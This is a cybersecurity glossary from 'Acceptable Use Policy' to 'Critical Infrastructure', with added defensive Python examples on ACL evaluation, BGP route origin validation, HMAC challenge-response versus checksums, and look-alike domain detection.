Acceptable Use Policy – This is a policy that defines the level of access and degree of use of the organization’s network or resource by the members of an organization or the general public. This is often applied to consumer products and in this context the AUP for your ISP might include that you can’t use the connection for business purposes.
Access Control List – This is a set of rules that tells an operating system (or a router, file server or cloud service) which users or groups may perform which operations on a resource, so that the system can decide whether or not a given user ID has permission to access it. Evaluation is normally default-deny, and an explicit deny entry usually overrides any allow.
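The following is an added example, not code from the glossary: a minimal ACL evaluator in Python showing the two rules of thumb above (default deny, and deny beats allow), with group membership resolved before rules are matched. The user names, group names, resource paths and rule set are constructed for the demonstration.

```python
"""Minimal ACL evaluator (added example, not the glossary's own code).

A rule is (principal, resource pattern, permission, effect). A principal is
either a user name or a group name prefixed with "group:". Evaluation is
default-deny and an explicit deny always wins over an allow, which is how
most operating-system and cloud ACLs behave.
"""
from dataclasses import dataclass
from fnmatch import fnmatchcase


@dataclass(frozen=True)
class Rule:
    principal: str   # "alice" or "group:finance"
    resource: str    # glob pattern, e.g. "/finance/*"
    permission: str  # "read", "write", ...
    effect: str      # "allow" or "deny"


# Constructed sample group membership and rule set (assumed, not from the page)
GROUPS = {"finance": {"alice", "bob"}, "admins": {"carol"}}

ACL = [
    Rule("group:finance", "/finance/*", "read", "allow"),
    Rule("group:admins", "/*", "read", "allow"),
    Rule("group:admins", "/*", "write", "allow"),
    # bob is in finance but must not see payroll: an explicit deny
    Rule("bob", "/finance/payroll.xlsx", "read", "deny"),
]


def principals_for(user: str) -> set:
    """The user's own name plus every group they belong to."""
    names = {user}
    for group, members in GROUPS.items():
        if user in members:
            names.add(f"group:{group}")
    return names


def is_allowed(acl, user: str, resource: str, permission: str) -> bool:
    """Return True only if some matching rule allows and no matching rule denies."""
    names = principals_for(user)
    allowed = False
    for rule in acl:
        if rule.principal not in names or rule.permission != permission:
            continue
        if not fnmatchcase(resource, rule.resource):
            continue
        if rule.effect == "deny":
            return False        # deny overrides any allow, regardless of order
        allowed = True
    return allowed              # nothing matched: default deny


if __name__ == "__main__":
    for user in ("alice", "bob", "carol", "dave"):
        print(user, "read payroll:", is_allowed(ACL, user, "/finance/payroll.xlsx", "read"))
```

The order of rules does not matter because a deny short-circuits the loop; systems that instead use "first matching rule wins" (many firewall ACLs) give different answers for the same rule set, so check which model a product uses before trusting a rule list.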
Access Point – This is a computer networking device which allows a Wi-Fi compliant device to connect to a wired network and usually connects via a router to an internal network or the Internet. An access point may also be implemented as part of your router or as a WiFi extender.
Access Profile – This is information about a user that is stored on a computer, including their name, their credentials (a properly built system stores only a password hash, never the password itself) and what they are allowed to access. It also records access rights and the type of access they have to particular computing resources.
Access Type and Rights – The type of access you have to a network, computing device or service will dictate what you can do with it. This might be classified as Administrative rights for high privilege access or more limited user level rights.
Active Security Testing – This is security testing which involves directly interacting with a target, for example by sending packets or requests and analysing the responses, as opposed to passive testing which only observes existing traffic. Active tests can crash or alter a target, so they should be authorised and scheduled.
Ad Fraud – This is concerned with the theory and practice of fraudulently representing online advertisement impressions, clicks, conversions or data events in order to generate revenue. Ad fraud is most commonly associated with banner ads, video ads and in-app ads. See also Click Fraud.
Adaptive security – This is a security model that monitors threats continuously and adjusts defences as threats change and evolve. With traditional security methods, organizations rely on firewalls, intrusion detection systems (IDS), antivirus software and intrusion prevention systems (IPS). While these remain a powerful defence, they are no longer enough on their own. Environments are no longer static, and security controls should be integrated into continuous deployment pipelines.
Advanced Encryption Standard (AES) – This is a symmetric block cipher (FIPS 197) established by the U.S. National Institute of Standards and Technology (NIST) in 2001, with a 128-bit block size and 128, 192 or 256-bit keys. It is the cipher behind WPA2/WPA3 Wi-Fi encryption, but is also used in TLS, disk encryption and much else.
Advanced Persistent Threat – This is a cyber attack that is long-term, highly targeted, and continuous. An APT attack is organized and has a central objective. Many advanced persistent threats are sponsored, usually by governments or competitors, and are aimed at stealing vital information from their targets. The objective of an APT attack could range from surveillance and stealing trade secrets to taking control of a network and completely disabling it.
Advanced Threat Protection – (ATP), is a type of security solution specifically designed to defend a network or system from sophisticated hacking or malware attacks that target sensitive data. ATP is usually available as a software or managed security service. Advanced Threat Protection solutions differ in terms of approach and components, but most include endpoint agents, email gateways, network devices, malware protection systems, and a centralized management console in order to manage defenses and correlate alerts.
Adware – This is not typically malware, but falls into a category of ‘Greyware’ and is typically unwanted software on your computer. This software will deliver adverts to your device (affects phones as well as PCs) that often go full screen, stopping you from using the application you are trying to use. They are often delivered through legitimate applications (see Bloatware) as well as apps that masquerade as something you might want. Adware can also be malicious, delivering adverts that lure you into sites containing malware. It is often hard to get rid of these applications (see Bloatware and Greyware).
Air-Gapped System – this is a system/PC that is physically isolated from other systems. These systems will typically be disconnected from internal networks and often will be standalone systems or operating within a network that is physically disconnected from the main network of a company. Such systems are often used by security professionals to investigate malware to remove any chance of infecting other company systems.
Amazon Prime Scam – Victims receive an automated call telling them that someone has signed up for an Amazon Prime subscription on their account. They’re then told to press 1 on their phone keypad to cancel, at which point they’re transferred to the scammer, who collects their credit card details.
American Standard Code for Information Interchange (ASCII) – This is a 7-bit character code in which each of the 128 possible values represents a single character (letters, digits, punctuation and control codes).
Anti-Virus Software – This is a software package you install on your device that protects you (within limits) against malware installing itself on your device. There are many vendors; independent test labs publish comparative detection rates, and no product catches everything, so it is one layer of defence rather than a complete one. See also ‘Internet Security Software‘.
Anonymous Logon – See Null Session.
App-Attack – This is a form of cyber attack that occurs when a user unknowingly installs a harmful app on their device (phone, PC) and the app in turn initiates some form of cyber attack (e.g. information stealing, activity monitoring, key logging, ransomware or other malware). See also Download Attack.
Asymmetric Key/Encryption – (public key) This uses a mathematically related pair of keys: a public key that can be shared freely and a private key that is kept secret. Data encrypted with the public key can only be decrypted with the private key, and a signature made with the private key can be checked by anyone holding the public key. See Public Key Encryption.
Attack Vector – This is any means by which an attacker gains entry into the target system. This can involve social engineering, malware or exploitation of vulnerabilities.
Auction Fraud – This is where someone is selling something on an online auction site, such as eBay, that appears to be something it really isn’t. For example, someone may claim to be selling tickets for an upcoming concert that really are not official tickets.
Authentication – In the context of computers, this is the process of verifying that a claimed identity (a person or a system) is genuine, for example by checking a username and password. It can be strengthened by combining factors, such as two-factor authentication, hardware tokens or certificates. Note that a CAPTCHA is not authentication: it only attempts to show that the user is human, not who they are.
Authorised Push Payment (APP) fraud – This is where criminals persuade victims to make a payment into their account by posing as a real organisation, or promising products that are never delivered.
Baiting – In the context of social engineering, this is an attack that uses physical media (such as a USB drive left where it will be found) or an enticing download or offer, and relies on the curiosity, or greed, of the victim to lure them into running it or clicking a link to a malicious website. This is likened to the concept of a ‘Trojan Horse’, but using electronic media. An example would be that you have an interest in motorcycles, so you receive an invite to a motorcycle event; the website you visit then implants malware on your device.
Back Door – This is often something malware will install on a computer system to allow the attacker to regain privileged access to it later. Back doors can also exist in systems due to programming mistakes (vulnerabilities), or by design so that the vendor, or the security services, can access the system without requesting access.
Backup – This is a copy of your important data that is kept away from, and preferably on a separate device that is not connected to, the device that contains the original (or cloud storage). Preferably the device you back up to should not be online and should be stored either in a separate location and/or in some form of fire safe (budget versions exist for consumers). An offline copy also protects against ransomware, which will encrypt any backup it can reach. See also our guidance on Backing up your data.
Baseline Security – This is the minimum set of security controls required for safeguarding an IT system. Baseline security is based upon a system’s identified needs for confidentiality, integrity and availability protection.
Biometrics – This is a security system which takes into account the unique physiological characteristics of a person, such as fingerprints, iris, face, voice or DNA, for identification and authentication purposes.
Black Box Attack – See Jackpotting Attack.
Black Core – This is a communication network architecture in which user data traversing a global internet protocol (IP) is end-to-end encrypted at the IP layer.
Black Hat Hacker – See also the definition of ‘Hacker’ and ‘White Hat Hacker’ below. This is typically a hacker whose intent is to utilise computer vulnerabilities to cause harm, or to commit some form of crime (e.g. extortion).
Blended Attack – This is a cyber attack that combines several techniques or vectors, for example a worm that spreads by exploiting a vulnerability and also drops a trojan or sends spam, in order to spread malicious code as widely as possible and evade defences that address only one vector.
Block Cipher – This is a method of encrypting data in fixed-size blocks (128 bits in the case of AES) rather than encrypting individual bits or bytes as they arrive. Because a block cipher on its own only handles one block, it is used with a mode of operation such as CBC or GCM to encrypt longer messages; the naive ECB mode leaks patterns in the data and should be avoided.
Bloatware – This is typically software that is installed at the same time as a wanted application. For example, you install Adobe PDF reader, and the Chrome web browser is installed by default unless you untick a checkbox during installation. This is often used as a mechanism to monetise free software, where the owner of the software hitching a ride pays the vendor to also carry it. This mechanism can also be used to deliver malware, so you have to be cautious when installing software you download from untrusted websites. You will also often find bloatware installed on low priced PCs and other devices (e.g. phones) as a way of delivering you a cheap product. Bloatware, like greyware, is often difficult to remove, and in the case of Android based devices almost impossible unless you ‘root’ the device.
Blue Team – This is a group of individuals who perform an analysis of information systems to ensure security, identify security flaws, verify the effectiveness of each security measure, and to make certain all security measures will continue to be effective after implementation. They will typically engage in:
- Defensive Security
- Infrastructure Protection
- Damage Control
- Incident Response
- Operational Security
- Threat hunting and assessment
- Digital Forensics.
See also Red Team, who typically test the effectiveness of the blue team by emulating the behaviours of a real black-hat hacking group, making the attack as realistic and chaotic as possible to challenge both teams equally.
Bluetooth – This is a wireless technology standard used for exchanging data between fixed and mobile devices over short distances using short-wavelength UHF radio waves in the industrial, scientific and medical radio bands, from 2.400 to 2.485 GHz, and building personal area networks (PANs). It was originally conceived as a wireless alternative to RS-232 data cables.
Bluetooth Attacks – Bluetooth technologies (see above) can be compromised, among others, using the following methods:
- Bluebugging
- Bluejacking
- Bluesnarfing
- BtleJacking.
An explanation of these terms can be found on an info-graphic provided by
@SecurityGuill. These attack vectors often exploit other vulnerabilities in the target device and in the implementation of the Bluetooth technology on the device.
Border Gateway Protocol – (BGP) This is the core Internet routing protocol by which networks (autonomous systems) announce to each other which IP address ranges (prefixes) they can reach, and so it determines the route that data takes across the Internet. BGP has no built-in way to verify that a network is entitled to announce a prefix, so route hijacking is possible: a network announces someone else's prefix, or a more specific slice of it, and routers prefer the most specific route they hear. A basic example would be traffic from a user in the United States to the New York Times website being routed via networks in Asia. RPKI route origin validation lets routers reject announcements whose origin is not authorised for that prefix.
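The following is an added example, not code from the glossary: a Python model of the two mechanisms described above. Routers pick the most specific matching prefix, so a /25 announced by a hijacker beats the owner's /24; a route origin validation step then drops the announcement because no ROA authorises that origin. The autonomous system numbers, the ROA entry and the prefixes (documentation ranges) are constructed for the example.

```python
"""Longest-prefix-match route selection with an RPKI-style origin check
(added example, not from the glossary). ASNs, prefixes and ROAs are constructed.
"""
import ipaddress


def best_route(table, dst):
    """table: list of (prefix, origin_asn). Return the origin AS the router
    would forward traffic for dst to, i.e. the most specific covering prefix."""
    dst = ipaddress.ip_address(dst)
    covering = [(ipaddress.ip_network(p), asn) for p, asn in table]
    covering = [(net, asn) for net, asn in covering if dst in net]
    if not covering:
        return None
    return max(covering, key=lambda entry: entry[0].prefixlen)[1]


# Route Origin Authorisations: (prefix, authorised origin AS, maxLength).
# Constructed: the owner of 203.0.113.0/24 is AS64500 and may only announce the /24.
ROAS = [("203.0.113.0/24", 64500, 24)]


def rov_state(prefix, origin_asn, roas=ROAS):
    """Route origin validation outcome: 'valid', 'invalid' or 'not-found'."""
    net = ipaddress.ip_network(prefix)
    matching = [(asn, maxlen) for p, asn, maxlen in roas
                if net.subnet_of(ipaddress.ip_network(p))]
    if not matching:
        return "not-found"            # no ROA covers this prefix at all
    if any(asn == origin_asn and net.prefixlen <= maxlen for asn, maxlen in matching):
        return "valid"
    return "invalid"                  # wrong origin, or more specific than allowed


def drop_invalid(table):
    """Filter a routing table the way an ROV-enforcing router would."""
    return [(p, asn) for p, asn in table if rov_state(p, asn) != "invalid"]


# Constructed tables: the legitimate view, then the same view plus a hijack
LEGIT_TABLE = [("203.0.113.0/24", 64500), ("0.0.0.0/0", 64501)]
HIJACKED_TABLE = LEGIT_TABLE + [("203.0.113.0/25", 64666)]


if __name__ == "__main__":
    print("before hijack:", best_route(LEGIT_TABLE, "203.0.113.42"))
    print("after hijack: ", best_route(HIJACKED_TABLE, "203.0.113.42"))
    print("with ROV:     ", best_route(drop_invalid(HIJACKED_TABLE), "203.0.113.42"))
```

Note that the /25 only covers half of the /24, so hosts in 203.0.113.128/25 keep reaching the real owner during the hijack; partial diversion like this is one reason hijacks can go unnoticed for a while.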
Botnet – This is a network of computers (sometimes nothing more than very small embedded IoT devices) that are infected with a form of malware allowing an attacker to control them remotely, and which are used to launch Distributed Denial of Service attacks, send spam, run credential stuffing or mine cryptocurrency. The owners of the individual devices forming the botnet often have no idea they are infected. Internet of Things (IoT) devices with default passwords or no authentication at all are among the most vulnerable.
Browser Fingerprinting – As browsers become increasingly entwined with the operating system, many unique details and preferences can be exposed through your browser. The sum total of these outputs can be used to render a unique “fingerprint” for tracking and identification purposes. Your browser fingerprint can reflect:
- the User agent header
- the Accept header
- the Connection header
- the Encoding header
- the Language header
- the list of plugins
- the platform
- the cookies preferences (allowed or not)
- the Do Not Track preferences (yes, no or not communicated)
- the timezone
- the screen resolution and its color depth
- the use of local storage
- the use of session storage
- a picture rendered with the HTML Canvas element
- a picture rendered with WebGL
- the presence of AdBlock
- the list of fonts.
Brute Force Attack – This is where a cyber attacker is trying to gain access to a computer system, but does not know the precise credentials to use. Therefore the attacker tries all combinations of credentials (e.g. user name/password combinations, or every word in a dictionary) to eventually come up with the right one. The longer and more complex passwords are, the longer it takes for an attacker to come up with the right combination. This is typically automated, and rate limiting, account lockout and multi-factor authentication are the usual countermeasures.
Buffer Overflow – This is when a program tries to store more data in a buffer than it was designed to hold. As there is a limit on how much data a buffer can hold, the surplus data overflows into the adjoining buffers and memory locations, overwriting the data stored there and triggering unpredictable consequences, which an attacker can sometimes steer into executing code of their choosing. This is a source of many vulnerabilities and is typically caused by a missing bounds check in languages such as C and C++.
Business Continuity Plan – This is also known as business emergency plan, it offers safeguards against a disaster, and outlines the strategies, action plan on how to continue business as usual in the event of any disaster. A disaster can be categorised by an environmental event (e.g. storms), power outages, earthquakes or cyber attack.
Business Email Compromise Attack – This is a form of cyber crime (abbreviated to BEC) which uses email fraud to attack commercial, Government and non-profit organizations to achieve a specific outcome which negatively impacts the target organization. Examples of common BEC attacks include invoice scams and spear phishing spoof attacks which are designed to gather data for other criminal activities. Often consumer privacy breaches occur as a result of a BEC attack. See also Cyber Enabled Fraud and Invoice Scam.
Business Impact Assessment – This is the process of evaluating and identifying risks and threats that a business might face in the event of an accident, disaster, cyber attack or an emergency. It evaluates the possible risk to tangible and intangible assets such as personnel, infrastructure, data and goodwill. In addition, it outlines the steps needed to recover from any such disasters.
Baseboard Management Controller – (BMC) This is a hardware chip at the core of Intelligent Platform Management Interface (IPMI) utilities that allows sysadmins to remotely control and monitor a server without having to access the operating system or applications running on it. In other words, a BMC is an out-of-band management system that allows admins to remotely reboot a device, analyse logs, install an operating system and update the firmware, making it one of the most privileged components in enterprise technology today. Its management interface should sit on an isolated network and its firmware should be kept patched.
CAPTCHA – This is an acronym for “Completely Automated Public Turing test to tell Computers and Humans Apart”, a type of challenge–response test used in computing to determine whether or not the user is human. It is often used as a challenge to weed out automated bot access to websites, but it is not foolproof (solving services and machine learning defeat many of them), and attackers sometimes place a CAPTCHA in front of a phishing page to make it look legitimate and to keep automated scanners away from the malicious content.
Card Skimmer – These are devices that enable thieves to copy information from the magnetic stripe of your credit/debit card when it is used at an ATM or in a store.
Catfish Scam – This is where a person creates a fake online profile with the intention of deceiving someone. For example, someone could create a fake profile on an online dating website, build a relationship with one or more people and then invent a scenario that asks them for money. Another example is someone who creates a fake Facebook account that resembles a friend so that they can view a certain person’s private information.
CEO Fraud – This is when an employee authorized to make payments is tricked into paying a fake invoice or making an unauthorized transfer out of a business account. Typically this starts as an email from a senior official who requests an urgent payment is made. See also BEC/Business Email Compromise Attack.
Certificate – When used in the context of authentication, this is a form of digital identity for a computer, user or organisation to allow the authentication and secure exchange of information. Sometimes also called a Digital Certificate.
Certificate Authority – In cryptography, a certificate authority or certification authority (CA) is an entity that issues digital certificates, vouching by its signature that a public key belongs to the named subject. Browsers and operating systems ship with a list of trusted root CAs, and a certificate is only trusted if it chains back to one of them.
Chain Mail Scam – Sometimes called Chain Letter or Chain Email, this is an unsolicited e-mail containing false information for the purpose of scaring, intimidating, or deceiving the recipient. Its purpose is to coerce the recipient to forward the e-mail to other unwilling recipients, thereby propagating the malicious or spurious message. They often prey on an individual’s sympathy for a sick or dying relative, or a common myth or scare is sent out and, because it seems significant or frightening, the recipient feels inclined to let all their friends know. This is also a method of spreading fake news.
Challenge Response Protocol – This is a kind of authentication protocol in which the verifier sends the claimant a fresh, unpredictable challenge (a nonce) and the claimant returns a response computed from the challenge and a secret. The verifier checks the response to establish the claimant’s control of the secret without the secret itself crossing the wire, and because each challenge is new, a captured response cannot be replayed later. A CAPTCHA is also a challenge–response test, but it only aims to show that the responder is human and proves control of no secret.
Checksum – This is a numerical value computed from a block of data and stored or transmitted alongside it, so that the recipient can recompute it and check that the data arrived error free: a mismatch indicates corruption. Simple checksums (such as the one’s-complement sum used by IP, TCP and UDP) catch accidental errors but not deliberate tampering, because an attacker can alter the data and recompute the checksum, or make changes that leave the sum unchanged. Integrity against an adversary needs a message authentication code or digital signature instead.
Chief Security Officer (CSO) – This is the role of an executive of the company with assigned responsibility to protect assets such as the infrastructure and personnel, including information in digital and physical form. Every company should assign a CSO, even if that person has multiple other roles.
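The following added example (not code from the glossary) covers both the Challenge Response Protocol and the Checksum entries above, since they share the same HMAC building block. The first half plays both sides of an HMAC-based challenge–response exchange and shows that a captured response fails against a fresh nonce; the second half computes the one’s-complement Internet checksum and shows a change that a checksum misses but an HMAC catches. The user names, secrets and message bytes are constructed.

```python
"""Challenge-response authentication and checksum-vs-MAC integrity, both built
on HMAC-SHA256 (added example; names, secrets and messages are constructed)."""
import hashlib
import hmac
import secrets


# ---- Challenge-response: verifier and claimant sides -----------------------
class Verifier:
    """Holds each user's shared secret and one outstanding challenge per user."""

    def __init__(self, user_secrets):
        self._secrets = dict(user_secrets)
        self._pending = {}

    def challenge(self, user):
        nonce = secrets.token_bytes(16)      # fresh and unpredictable every time
        self._pending[user] = nonce
        return nonce

    def verify(self, user, response):
        nonce = self._pending.pop(user, None)  # single use: a replay finds no nonce
        if nonce is None or user not in self._secrets:
            return False
        expected = hmac.new(self._secrets[user], nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)   # constant-time compare


class Claimant:
    def __init__(self, user, secret):
        self.user, self.secret = user, secret

    def respond(self, nonce):
        # The secret never leaves the claimant; only the keyed digest does.
        return hmac.new(self.secret, nonce, hashlib.sha256).digest()


def run_exchange(verifier, claimant):
    nonce = verifier.challenge(claimant.user)
    return verifier.verify(claimant.user, claimant.respond(nonce))


def replay_attack(verifier, claimant):
    """Eavesdropper records one valid response and replays it in a new session."""
    nonce = verifier.challenge(claimant.user)
    captured = claimant.respond(nonce)
    verifier.verify(claimant.user, captured)   # the legitimate session completes
    verifier.challenge(claimant.user)          # new session issues a new nonce
    return verifier.verify(claimant.user, captured)


# ---- Checksum versus MAC ----------------------------------------------------
def internet_checksum(data: bytes) -> int:
    """RFC 1071 style one's-complement sum of 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:                         # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def flip_bit(data: bytes, bit: int) -> bytes:
    out = bytearray(data)
    out[bit // 8] ^= 1 << (bit % 8)
    return bytes(out)


def swap_words(data: bytes, i: int, j: int) -> bytes:
    """Exchange 16-bit words i and j; the sum of words is unchanged."""
    out = bytearray(data)
    out[2 * i:2 * i + 2], out[2 * j:2 * j + 2] = data[2 * j:2 * j + 2], data[2 * i:2 * i + 2]
    return bytes(out)


MSG = b"PAY 0010 TO ACCT 4242"       # constructed message
KEY = b"shared-secret"               # constructed key


def checksum_catches(original: bytes, modified: bytes) -> bool:
    return internet_checksum(original) != internet_checksum(modified)


def mac(data: bytes) -> bytes:
    return hmac.new(KEY, data, hashlib.sha256).digest()


def mac_catches(original: bytes, modified: bytes) -> bool:
    return not hmac.compare_digest(mac(original), mac(modified))


if __name__ == "__main__":
    v = Verifier({"alice": b"alice-secret"})
    print("login:", run_exchange(v, Claimant("alice", b"alice-secret")))
    print("replay:", replay_attack(v, Claimant("alice", b"alice-secret")))
    tampered = swap_words(MSG, 2, 3)           # "PAY 0010" becomes "PAY 1000"
    print(tampered, "checksum caught:", checksum_catches(MSG, tampered),
          "mac caught:", mac_catches(MSG, tampered))
```

Swapping the words "00" and "10" turns a payment of 0010 into 1000 while leaving the one’s-complement sum identical, which is exactly the kind of edit a checksum was never designed to resist.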
Cipher – This is a mathematical algorithm that is used to encrypt data. There are many different ciphers that are used in various parts of the security landscape.
Cipher Text – This is data converted from plain text into encrypted form using an algorithm and a key, making it unreadable without the key.
Ciphony – This is the process of enciphering audio information with the result of encrypted speech.
Cleartext – This is data that is not encrypted or otherwise encoded, and so can be read by anyone who obtains it, whether it is stored on disk or captured in transit.
Click Fraud – This is the practice of clicking on paid ads with the sole intention of depleting or diverting the budget of the advertiser. It could be a disgruntled competitor who knows how much you pay per click and wants to hit you where it hurts (in the wallet), or it could be a shady network of criminals running multiple websites designed to channel those advertising dollars into their own accounts. This is often automated using bots.
Click Injection – This is a sophisticated form of click spamming. By publishing an app which listens to “install broadcasts,” it’s possible to detect when other apps are downloaded on a device. This enables fraudsters to trigger clicks before the install is complete. Without preventative tools in place, this means the fraudster will receive credit for the install.
Clickjacking – This is a malicious technique of tricking a user into clicking on something different from what the user perceives, typically by loading the target site in an invisible frame over a decoy page, thus potentially revealing confidential information or allowing others to take actions in the user’s account while they click on seemingly innocuous objects. This is also classified as a User Interface Redress Attack, UI Redress Attack or UI Redressing. Sites defend against it with the X-Frame-Options header or a Content Security Policy frame-ancestors directive.
Click Spam – This type of fraud happens when a fraudster executes a click for users who are none-the-wiser (in fact, it is unlikely that the user is even exposed to the ad). Click Spam is also known as organics poaching. See also Mobile Ad Fraud.
Cloud – This is typically referencing a set of software defined services that exist in a remote data centre. Such services are:
- Software as a Service (SaaS) – where a complete application is hosted remotely (e.g. Office 365, a hosted database). This can also be a platform that can be configured/customised to deliver a service of your own design.
- Platform as a Service (PaaS) – where the provider runs the operating system, runtime and middleware and you deploy only your own application code and data.
- Infrastructure as a Service (IaaS) – where the hosting provider hosts your own servers as virtual machines, with networking and storage, in managed and unmanaged forms; you remain responsible for patching and securing the operating system and everything above it.
- Storage as a Service – where the hosting provider provides storage for files remotely (e.g. OneDrive, Google Drive) – see also Cloud Storage.
Cloud Computing – This is the delivery of computing services (including servers, storage, databases, networking, software, business analytics and intelligence) over the Internet (“the cloud”) to offer faster innovation, flexible resources and economies of scale. Typically, you only pay for cloud services you use, helping you lower your operating costs, run your infrastructure more efficiently and scale as your business needs change. See also Edge Computing.
Cloud Storage – This is a service offered by a service provider (e.g. Google, Microsoft, Amazon Web Services) that allows you to store a limited amount of files on their service as a form of backup or to allow you to access the files from multiple locations and devices. It is effectively your disk drive in the cloud. These services come in various capacities, and often come with a free allocation in the order of 5 GB. Any additional storage you add will be subject to a monthly subscription charge.
Cold Call Scam – This is where, for example, someone claiming to be from technical support from a computer company like Dell, saying they have received information that your computer is infected with a virus, or hacked. They offer to remotely connect to your computer and fix the problem. This typically involves some form of urgency and can be applied to different scenarios.
Cold Site – This is a backup facility with power, cooling, space and network connectivity but no installed computer equipment, ready to receive hardware should operations need to move to an alternate location. Because equipment has to be delivered, installed and restored from backups, it is the slowest of the recovery site types (typically days to weeks), compared with a warm site (equipment in place, data still to be restored) or a hot site (a running duplicate that can take over almost immediately).
Common Attack Pattern Enumeration and Classification – (CAPEC) This is a catalogue published by the MITRE Corporation that details how vulnerable systems are attacked. The community-developed catalogue describes common attack patterns and how such attacks are executed.
Compartmentalization – This is a technique of protecting confidential information by revealing it only to the few people who actually need to know the details to perform their job. Thus, by restricting access to information and data, the risk to business objectives is limited.
Computer Emergency Response Team (CERT) – This is a team formed to study the vulnerabilities of information systems of an organization and offer solutions and strategies to face such vulnerabilities. Such teams are highly organized with clearly defined roles and responsibilities.
Computer Software Service Fraud – The fraudster will ask for remote access to the victim’s computer to fix a virus or other issue, then they search the device for the victim’s financial details. In this scam the victim is targeted via phone, email or pop-up ad.
Computer Forensics – This is the process of analysing computer devices on suspecting that such devices may have been used in a cybercrime, with the aim of gathering evidence for presentation in a court of law.
Consent Phishing – This is where cyber attackers trick users into granting a malicious app access to sensitive data or other resources. Instead of trying to steal the user’s password, an attacker is seeking permission for an attacker-controlled app to access valuable data.
Content Filtering – This is a process by which access to certain content, information and data is restricted, limited, or completely blocked based on organization’s rules.
Cookie – (often also called web cookie, Internet cookie or browser cookie) This is a small piece of data sent from a website and stored on the user’s computer by the user’s web browser while the user is browsing. Cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items added in the shopping cart in an online store) or to record the user’s browsing activity (including clicking particular buttons, logging in, or recording which pages were visited in the past). They can also be used to remember arbitrary pieces of information that the user previously entered into form fields such as names, addresses, passwords, and credit card numbers. There are various types of Cookie currently in use:
- Session Cookie (normally only valid while the browser is running and lost when the browser closes)
- Persistent Cookie (stored to disk and can be retrieved in a future browser session)
- Secure Cookie (transmitted only over secure connections)
- Third Party Cookie (a cookie that is set by a different domain from that of the website being browsed)
- Zombie Cookie ( a cookie that is automatically recreated after being deleted).
Cookie Stuffing – This is a technique where a website or browser extension adds extra information to a user’s cookie. The technique is often used in affiliate marketing to hijack traffic from its legitimate source. As a result of visiting a website, a user receives a third-party cookie from a website unrelated to that visited by the user, usually without the user being aware of it. If the user later visits the target website and completes a qualifying transaction (such as making a purchase), the cookie stuffer is paid a commission by the target. Because the stuffer has not actually encouraged the user to visit the target, this technique is considered illegitimate by many affiliate schemes.
Courier Fraud – This is when a fraudster contacts victims by telephone purporting to be a police officer or bank official. To substantiate this claim, the caller might be able to confirm some easily obtainable basic details about the victim such as their full name and address. The caller may also offer a telephone number for the victim to telephone or ask the victim to call the number on the back of their bank card to check that they are genuine. In these circumstances, either the number offered will not be genuine or, where a genuine number is suggested, the fraudster will stay on the line and pass the victim to a different individual.
Cousin Domain – This is also referred to as a look-alike domain, and is a Domain Name System (DNS) domain that looks similar to another name when rendered by a Mail User Agent (MUA) or a web browser. For example, groupA.example is a cousin domain of group.example. Other examples include misspellings of a domain such as returnpaht.com and returpath.com, or digits and similar-looking characters substituted for letters.
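The following is an added example, not code from the glossary: a Python detector that flags cousin domains against a protected list using the three tricks named above (typos measured by edit distance, character look-alikes reduced to a common skeleton, and a brand name embedded in a longer label). The protected list reuses the page's returnpath.com and group.example; the look-alike table is a small constructed subset of the real Unicode confusables data.

```python
"""Cousin / look-alike domain detection (added example, not from the glossary).
The protected brand list and the homoglyph table are constructed."""
import unicodedata

PROTECTED = ("returnpath.com", "group.example")   # constructed brand list

# Small constructed confusables table; a real deployment would use the
# Unicode confusables list (UTS #39).
_SINGLE = str.maketrans({"0": "o", "1": "l", "|": "l", "5": "s", "3": "e"})
_MULTI = (("rn", "m"), ("vv", "w"), ("cl", "d"))


def skeleton(label: str) -> str:
    """Collapse look-alike characters so visually similar labels compare equal."""
    s = unicodedata.normalize("NFKD", label).encode("ascii", "ignore").decode().lower()
    for pair, single in _MULTI:
        s = s.replace(pair, single)
    return s.translate(_SINGLE)


def levenshtein(a: str, b: str) -> int:
    """Minimum number of single-character edits turning a into b."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def second_level(domain: str) -> str:
    """Label left of the TLD. Naive: does not know multi-part suffixes like co.uk."""
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def is_cousin(domain: str, protected=PROTECTED, max_distance: int = 2):
    """Return (flagged, reason) for a candidate domain."""
    domain = domain.lower().rstrip(".")
    label = second_level(domain)
    for good in protected:
        glabel = second_level(good)
        if domain == good:
            return (False, "exact match")
        if skeleton(label) == skeleton(glabel):
            return (True, f"homoglyph/typo of {good}")
        if levenshtein(label, glabel) <= max_distance:
            return (True, f"within {max_distance} edits of {good}")
        if glabel in label:
            return (True, f"embeds brand {good}")
    return (False, "no match")


if __name__ == "__main__":
    for d in ("returnpaht.com", "returpath.com", "groupA.example",
              "returnpath-login.com", "returnpath.com", "wikipedia.org"):
        print(f"{d:24} {is_cousin(d)}")
```

The edit-distance threshold is the knob to tune: 2 is right for ten-character brands but will over-flag short ones, so scale it with label length or whitelist known legitimate neighbours.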
Countermeasure – This is a defensive mechanism that helps mitigate risk, threat, to a network or computers, using a process, system or a device. Such a countermeasure would be an anti-virus solution or a firewall.
Credential Stuffing – This is where a cyber attacker attempts to gain access to a computer system (e.g. your favourite shopping website) using username/password pairs obtained from earlier data breaches, relying on people reusing the same password across sites. The attacker typically tries previously disclosed credentials en masse, almost always through automation, so thousands of credentials can be tried in a very short time. Unlike a brute force attack, each account usually sees only one or two attempts, which is why per-account lockouts alone do not stop it. See also my blogs on Effective use of Passwords and Bot Based Credential Stuffing.
Critical Infrastructure – This is the fundamental system of an organization that is important for its survival; any threat to such basic systems would put the entire organization in jeopardy. This term is also used to describe critical services for a country, such as the electricity supply and communications infrastructure. In this context a typical cyber warfare tactic would be to disable a country’s critical infrastructure to render it incapable of responding to other, more physical, attacks and invasion.
